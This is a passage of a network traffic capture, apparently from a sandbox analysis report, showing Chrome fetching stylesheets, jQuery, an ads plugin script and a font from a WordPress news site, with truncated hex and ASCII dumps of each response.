                                                        2025-03-11 18:02:43 UTC681INData Raw: 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 30 32 35 70 78 29 7b 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 6c 75 6d 6e 2d 67 61 70 2d 64 65 66 61 75 6c 74 3e 2e 65 6c 65 6d 65 6e 74 6f 72 2d 72 6f 77 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 72 6f 77 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 6c 75 6d 6e 2d 67 61 70 2d 64 65 66 61 75 6c 74 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 72 6f 77 7b 77 69 64 74 68 3a 63 61 6c 63 28 31 30 30 25 20 2b 20 32 30 70 78 29 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 31 30 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2d 31 30 70 78 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 72 6f 77 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 6c 75 6d 6e 2d 67 61 70 2d 6e 61 72 72 6f 77 20 2e 65 6c 65 6d 65 6e 74
                                                        Data Ascii: @media screen and (min-width:1025px){.elementor-column-gap-default>.elementor-row,.elementor-row .elementor-column-gap-default .elementor-row{width:calc(100% + 20px);margin-left:-10px;margin-right:-10px}.elementor-row .elementor-column-gap-narrow .element


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        20192.168.2.449764198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:45 UTC569OUTGET /wp-content/themes/style.css?ver=1.0.0 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:02:45 UTC203INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:43 GMT
                                                        Content-Type: text/css
                                                        Content-Length: 566
                                                        Connection: close
                                                        Last-Modified: Wed, 21 Nov 2018 22:32:52 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:02:45 UTC566INData Raw: 2f 2a 0d 0a 54 68 65 6d 65 20 4e 61 6d 65 3a 20 4a 4e 65 77 73 20 2d 20 43 68 69 6c 64 20 54 68 65 6d 65 0d 0a 56 65 72 73 69 6f 6e 3a 20 31 2e 30 2e 30 0d 0a 54 68 65 6d 65 20 55 52 49 3a 20 68 74 74 70 3a 2f 2f 74 68 65 6d 65 66 6f 72 65 73 74 2e 6e 65 74 2f 3f 72 65 66 3d 6a 65 67 74 68 65 6d 65 0d 0a 44 65 73 63 72 69 70 74 69 6f 6e 3a 20 41 20 62 61 73 69 63 20 73 74 61 72 74 65 72 20 63 68 69 6c 64 20 74 68 65 6d 65 20 66 6f 72 20 63 75 73 74 6f 6d 69 7a 61 74 69 6f 6e 20 70 75 72 70 6f 73 65 20 6f 66 20 4a 4e 65 77 73 20 74 68 65 6d 65 2e 0d 0a 41 75 74 68 6f 72 3a 20 4a 65 67 74 68 65 6d 65 0d 0a 41 75 74 68 6f 72 20 55 52 49 3a 20 68 74 74 70 3a 2f 2f 74 68 65 6d 65 66 6f 72 65 73 74 2e 6e 65 74 2f 75 73 65 72 2f 6a 65 67 74 68 65 6d 65 3f 72 65
                                                        Data Ascii: /*Theme Name: JNews - Child ThemeVersion: 1.0.0Theme URI: http://themeforest.net/?ref=jegthemeDescription: A basic starter child theme for customization purpose of JNews theme.Author: JegthemeAuthor URI: http://themeforest.net/user/jegtheme?re


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        21192.168.2.449763198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:45 UTC589OUTGET /wp-content/themes/jnews/assets/css/darkmode.css?ver=1.0.0 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:02:45 UTC205INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:43 GMT
                                                        Content-Type: text/css
                                                        Content-Length: 47490
                                                        Connection: close
                                                        Last-Modified: Tue, 12 Nov 2024 22:53:34 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:02:45 UTC16179INData Raw: 2e 6a 6e 65 77 73 2d 64 61 72 6b 2d 6d 6f 64 65 7b 2d 2d 6a 2d 67 72 65 79 2d 62 67 2d 63 6f 6c 6f 72 3a 23 34 39 34 39 34 39 3b 2d 2d 6a 2d 64 61 72 6b 67 72 65 79 2d 62 67 2d 63 6f 6c 6f 72 3a 23 32 38 32 38 32 38 3b 2d 2d 6a 2d 62 67 2d 63 6f 6c 6f 72 3a 23 31 41 31 41 31 41 3b 2d 2d 6a 2d 64 61 72 6b 2d 62 67 2d 63 6f 6c 6f 72 3a 23 31 33 31 33 31 33 3b 2d 2d 6a 2d 74 78 74 2d 63 6f 6c 6f 72 3a 23 43 41 43 41 43 41 3b 2d 2d 6a 2d 6c 69 6e 6b 2d 74 78 74 2d 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 3b 2d 2d 6a 2d 6d 65 74 61 2d 74 78 74 2d 63 6f 6c 6f 72 3a 23 38 42 38 42 38 42 3b 2d 2d 6a 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 6a 2d 74 78 74 2d 63 6f 6c 6f 72 29 3b 62 61 63 6b 67 72 6f 75 6e
                                                        Data Ascii: .jnews-dark-mode{--j-grey-bg-color:#494949;--j-darkgrey-bg-color:#282828;--j-bg-color:#1A1A1A;--j-dark-bg-color:#131313;--j-txt-color:#CACACA;--j-link-txt-color:#ffffff;--j-meta-txt-color:#8B8B8B;--j-border-color:#303030;color:var(--j-txt-color);backgroun
                                                        2025-03-11 18:02:45 UTC16384INData Raw: 70 6f 73 74 62 6c 6f 63 6b 20 2e 6a 65 67 5f 70 6f 73 74 5f 74 69 74 6c 65 20 61 2c 2e 6a 6e 65 77 73 2d 64 61 72 6b 2d 6d 6f 64 65 20 2e 6a 65 67 5f 70 6f 73 74 62 6c 6f 63 6b 20 2e 6a 65 67 5f 72 65 61 64 6d 6f 72 65 2c 2e 6a 6e 65 77 73 2d 64 61 72 6b 2d 6d 6f 64 65 20 2e 6a 65 67 5f 70 6f 73 74 62 6c 6f 63 6b 20 2e 6f 6b 61 79 4e 61 76 5f 5f 6d 65 6e 75 2d 74 6f 67 67 6c 65 2e 69 63 6f 6e 2d 2d 61 63 74 69 76 65 20 73 70 61 6e 2c 2e 6a 6e 65 77 73 2d 64 61 72 6b 2d 6d 6f 64 65 20 2e 6a 65 67 5f 70 6f 73 74 62 6c 6f 63 6b 20 2e 6f 6b 61 79 4e 61 76 5f 5f 6e 61 76 2d 2d 69 6e 76 69 73 69 62 6c 65 20 61 2c 2e 6a 6e 65 77 73 2d 64 61 72 6b 2d 6d 6f 64 65 20 2e 6a 65 67 5f 70 6f 73 74 62 6c 6f 63 6b 20 2e 6f 77 6c 2d 63 61 72 6f 75 73 65 6c 20 2e 6f 77 6c
                                                        Data Ascii: postblock .jeg_post_title a,.jnews-dark-mode .jeg_postblock .jeg_readmore,.jnews-dark-mode .jeg_postblock .okayNav__menu-toggle.icon--active span,.jnews-dark-mode .jeg_postblock .okayNav__nav--invisible a,.jnews-dark-mode .jeg_postblock .owl-carousel .owl
                                                        2025-03-11 18:02:46 UTC14927INData Raw: 73 6f 75 72 63 65 20 61 2c 2e 6a 6e 65 77 73 2d 64 61 72 6b 2d 6d 6f 64 65 20 2e 6a 65 67 5f 70 6f 73 74 5f 74 61 67 73 20 61 2c 2e 6a 6e 65 77 73 2d 64 61 72 6b 2d 6d 6f 64 65 20 2e 6a 65 67 5f 70 6f 73 74 5f 76 69 61 20 61 2c 2e 6a 6e 65 77 73 2d 64 61 72 6b 2d 6d 6f 64 65 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 23 72 65 73 70 6f 6e 64 20 69 6e 70 75 74 23 73 75 62 6d 69 74 2c 2e 6a 6e 65 77 73 2d 64 61 72 6b 2d 6d 6f 64 65 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 61 2e 62 75 74 74 6f 6e 2c 2e 6a 6e 65 77 73 2d 64 61 72 6b 2d 6d 6f 64 65 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 62 75 74 74 6f 6e 2e 62 75 74 74 6f 6e 2c 2e 6a 6e 65 77 73 2d 64 61 72 6b 2d 6d 6f 64 65 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 69 6e 70 75 74 2e 62 75 74 74 6f 6e 2c 2e
                                                        Data Ascii: source a,.jnews-dark-mode .jeg_post_tags a,.jnews-dark-mode .jeg_post_via a,.jnews-dark-mode .woocommerce #respond input#submit,.jnews-dark-mode .woocommerce a.button,.jnews-dark-mode .woocommerce button.button,.jnews-dark-mode .woocommerce input.button,.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        22192.168.2.449762198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:45 UTC563OUTGET /wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:02:46 UTC219INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:43 GMT
                                                        Content-Type: application/javascript
                                                        Content-Length: 87553
                                                        Connection: close
                                                        Last-Modified: Mon, 10 Jun 2024 12:48:07 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:02:46 UTC16165INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 37 2e 31 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                        Data Ascii: /*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                        2025-03-11 18:02:46 UTC16384INData Raw: 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 65 28 65 2c 22 69 6e 70 75 74 22 29 26 26 22 62 75 74 74 6f 6e 22 3d 3d 3d 65 2e 74 79 70 65 7c 7c 66 65 28 65 2c 22 62 75 74 74 6f 6e 22 29 7d 2c 74 65 78 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 72 65 74 75 72 6e 20 66 65 28 65 2c 22 69 6e 70 75 74 22 29 26 26 22 74 65 78 74 22 3d 3d 3d 65 2e 74 79 70 65 26 26 28 6e 75 6c 6c 3d 3d 28 74 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 29 29 7c 7c 22 74 65 78 74 22 3d 3d 3d 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 7d 2c 66 69 72 73 74 3a 58 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 5b 30 5d 7d 29 2c 6c 61 73 74 3a 58 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 5b 74 2d 31 5d
                                                        Data Ascii: unction(e){return fe(e,"input")&&"button"===e.type||fe(e,"button")},text:function(e){var t;return fe(e,"input")&&"text"===e.type&&(null==(t=e.getAttribute("type"))||"text"===t.toLowerCase())},first:X(function(){return[0]}),last:X(function(e,t){return[t-1]
                                                        2025-03-11 18:02:46 UTC16384INData Raw: 75 6e 63 74 69 6f 6e 28 29 7b 5f 2e 72 65 6d 6f 76 65 28 65 2c 5b 74 2b 22 71 75 65 75 65 22 2c 6e 5d 29 7d 29 7d 29 7d 7d 29 2c 63 65 2e 66 6e 2e 65 78 74 65 6e 64 28 7b 71 75 65 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 76 61 72 20 65 3d 32 3b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 74 26 26 28 6e 3d 74 2c 74 3d 22 66 78 22 2c 65 2d 2d 29 2c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3c 65 3f 63 65 2e 71 75 65 75 65 28 74 68 69 73 5b 30 5d 2c 74 29 3a 76 6f 69 64 20 30 3d 3d 3d 6e 3f 74 68 69 73 3a 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 63 65 2e 71 75 65 75 65 28 74 68 69 73 2c 74 2c 6e 29 3b 63 65 2e 5f 71 75 65 75 65 48 6f 6f 6b 73 28 74 68 69 73 2c 74 29 2c 22 66 78
                                                        Data Ascii: unction(){_.remove(e,[t+"queue",n])})})}}),ce.fn.extend({queue:function(t,n){var e=2;return"string"!=typeof t&&(n=t,t="fx",e--),arguments.length<e?ce.queue(this[0],t):void 0===n?this:this.each(function(){var e=ce.queue(this,t,n);ce._queueHooks(this,t),"fx
                                                        2025-03-11 18:02:46 UTC16384INData Raw: 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 63 65 2e 69 6e 41 72 72 61 79 28 74 68 69 73 2c 6e 29 3c 30 26 26 28 63 65 2e 63 6c 65 61 6e 44 61 74 61 28 53 65 28 74 68 69 73 29 29 2c 74 26 26 74 2e 72 65 70 6c 61 63 65 43 68 69 6c 64 28 65 2c 74 68 69 73 29 29 7d 2c 6e 29 7d 7d 29 2c 63 65 2e 65 61 63 68 28 7b 61 70 70 65 6e 64 54 6f 3a 22 61 70 70 65 6e 64 22 2c 70 72 65 70 65 6e 64 54 6f 3a 22 70 72 65 70 65 6e 64 22 2c 69 6e 73 65 72 74 42 65 66 6f 72 65 3a 22 62 65 66 6f 72 65 22 2c 69 6e 73 65 72 74 41 66 74 65 72 3a 22 61 66 74 65 72 22 2c 72 65 70 6c 61 63 65 41 6c 6c 3a 22 72 65 70 6c 61 63 65 57 69 74 68 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 61 29 7b 63 65 2e 66 6e 5b 65 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 3d 5b
                                                        Data Ascii: .parentNode;ce.inArray(this,n)<0&&(ce.cleanData(Se(this)),t&&t.replaceChild(e,this))},n)}}),ce.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(e,a){ce.fn[e]=function(e){for(var t,n=[
                                                        2025-03-11 18:02:46 UTC16384INData Raw: 2e 73 65 74 28 65 2c 6e 2c 74 29 29 3f 72 3a 65 5b 74 5d 3d 6e 3a 69 26 26 22 67 65 74 22 69 6e 20 69 26 26 6e 75 6c 6c 21 3d 3d 28 72 3d 69 2e 67 65 74 28 65 2c 74 29 29 3f 72 3a 65 5b 74 5d 7d 2c 70 72 6f 70 48 6f 6f 6b 73 3a 7b 74 61 62 49 6e 64 65 78 3a 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 63 65 2e 66 69 6e 64 2e 61 74 74 72 28 65 2c 22 74 61 62 69 6e 64 65 78 22 29 3b 72 65 74 75 72 6e 20 74 3f 70 61 72 73 65 49 6e 74 28 74 2c 31 30 29 3a 62 74 2e 74 65 73 74 28 65 2e 6e 6f 64 65 4e 61 6d 65 29 7c 7c 77 74 2e 74 65 73 74 28 65 2e 6e 6f 64 65 4e 61 6d 65 29 26 26 65 2e 68 72 65 66 3f 30 3a 2d 31 7d 7d 7d 2c 70 72 6f 70 46 69 78 3a 7b 22 66 6f 72 22 3a 22 68 74 6d 6c 46 6f 72 22 2c 22 63 6c 61 73 73 22 3a 22 63 6c 61 73
                                                        Data Ascii: .set(e,n,t))?r:e[t]=n:i&&"get"in i&&null!==(r=i.get(e,t))?r:e[t]},propHooks:{tabIndex:{get:function(e){var t=ce.find.attr(e,"tabindex");return t?parseInt(t,10):bt.test(e.nodeName)||wt.test(e.nodeName)&&e.href?0:-1}}},propFix:{"for":"htmlFor","class":"clas
                                                        2025-03-11 18:02:46 UTC5852INData Raw: 74 65 72 28 22 6a 73 6f 6e 20 6a 73 6f 6e 70 22 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 2c 61 3d 21 31 21 3d 3d 65 2e 6a 73 6f 6e 70 26 26 28 5a 74 2e 74 65 73 74 28 65 2e 75 72 6c 29 3f 22 75 72 6c 22 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 2e 64 61 74 61 26 26 30 3d 3d 3d 28 65 2e 63 6f 6e 74 65 6e 74 54 79 70 65 7c 7c 22 22 29 2e 69 6e 64 65 78 4f 66 28 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 22 29 26 26 5a 74 2e 74 65 73 74 28 65 2e 64 61 74 61 29 26 26 22 64 61 74 61 22 29 3b 69 66 28 61 7c 7c 22 6a 73 6f 6e 70 22 3d 3d 3d 65 2e 64 61 74 61 54 79 70 65 73 5b 30 5d 29 72 65 74 75 72 6e 20 72 3d 65 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63
                                                        Data Ascii: ter("json jsonp",function(e,t,n){var r,i,o,a=!1!==e.jsonp&&(Zt.test(e.url)?"url":"string"==typeof e.data&&0===(e.contentType||"").indexOf("application/x-www-form-urlencoded")&&Zt.test(e.data)&&"data");if(a||"jsonp"===e.dataTypes[0])return r=e.jsonpCallbac


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        23192.168.2.449761198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:45 UTC571OUTGET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:02:46 UTC219INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:44 GMT
                                                        Content-Type: application/javascript
                                                        Content-Length: 13577
                                                        Connection: close
                                                        Last-Modified: Mon, 10 Jun 2024 12:48:07 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:02:46 UTC13577INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 4d 69 67 72 61 74 65 20 76 33 2e 34 2e 31 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 26 26 28 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 3d 21 30 29 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72
                                                        Data Ascii: /*! jQuery Migrate v3.4.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */"undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){r


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        24192.168.2.449765198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:46 UTC593OUTGET /wp-content/plugins/advanced-ads/public/assets/js/advanced.min.js?ver=1.52.3 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:02:46 UTC218INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:45 GMT
                                                        Content-Type: application/javascript
                                                        Content-Length: 7581
                                                        Connection: close
                                                        Last-Modified: Fri, 14 Jun 2024 14:47:31 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:02:46 UTC7581INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 65 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 22 73 79 6d 62 6f 6c 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 3f 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 65 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 26 26 65 21 3d 3d 53 79 6d 62 6f 6c 2e 70 72 6f 74 6f 74 79 70 65 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 2c 65 28 74 29 7d 21 66 75 6e 63 74 69 6f 6e 28 29 7b 69
                                                        Data Ascii: !function(){function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e(t)}!function(){i


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        25192.168.2.449766198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:48 UTC672OUTGET /wp-content/themes/jnews/assets/dist/font/fontawesome-webfont.woff2 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        Origin: https://hardylive.com
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: font
                                                        Referer: https://hardylive.com/wp-content/themes/jnews/assets/dist/frontend.min.css?ver=1.0.0
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:02:49 UTC207INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:47 GMT
                                                        Content-Type: font/woff2
                                                        Content-Length: 77160
                                                        Connection: close
                                                        Last-Modified: Wed, 13 Nov 2024 21:12:02 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:02:49 UTC16177INData Raw: 77 4f 46 32 00 01 00 00 00 01 2d 68 00 0d 00 00 00 02 86 98 00 01 2d 0e 00 04 01 cb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3f 46 46 54 4d 1c 1a 20 06 60 00 85 72 11 08 0a 89 99 28 87 b6 58 01 36 02 24 03 95 70 0b 96 10 00 04 20 05 89 06 07 b4 75 5b 52 09 72 47 61 f7 91 84 2a ba 0d 81 27 ed 3d eb 3a b5 1a 26 d3 cd 3d 72 b7 2a 0a 02 19 e5 1a f1 f6 5d 04 74 07 dc 45 aa 6e a3 b2 ff ff ff ff e4 a4 31 46 db 0e dc 40 e0 d5 f4 fb 7c ad 8a 14 08 66 93 6d 92 60 9b 24 d8 91 a1 40 64 5b 42 51 11 24 28 5b 55 3c 2b 28 ad b8 40 50 d0 35 1e e4 60 81 b0 0e da 3e f6 50 10 1a 3b e1 28 91 d1 31 b3 fd 6c db fe 68 d4 a8 a2 c2 29 9f dc 59 79 94 f2 4a 69 e9 eb 17 ad 85 ce 7c 25 db 81 b7 5e ac 14 47 82 a2 33 b8 12 6e 9e 95 e8 ba da 95 dc 0a c4 cd 90 44 8a 9e
                                                        Data Ascii: wOF2-h-?FFTM `r(X6$p u[RrGa*'=:&=r*]tEn1F@|fm`$@d[BQ$([U<+(@P5`>P;(1lh)YyJi|%^G3nD
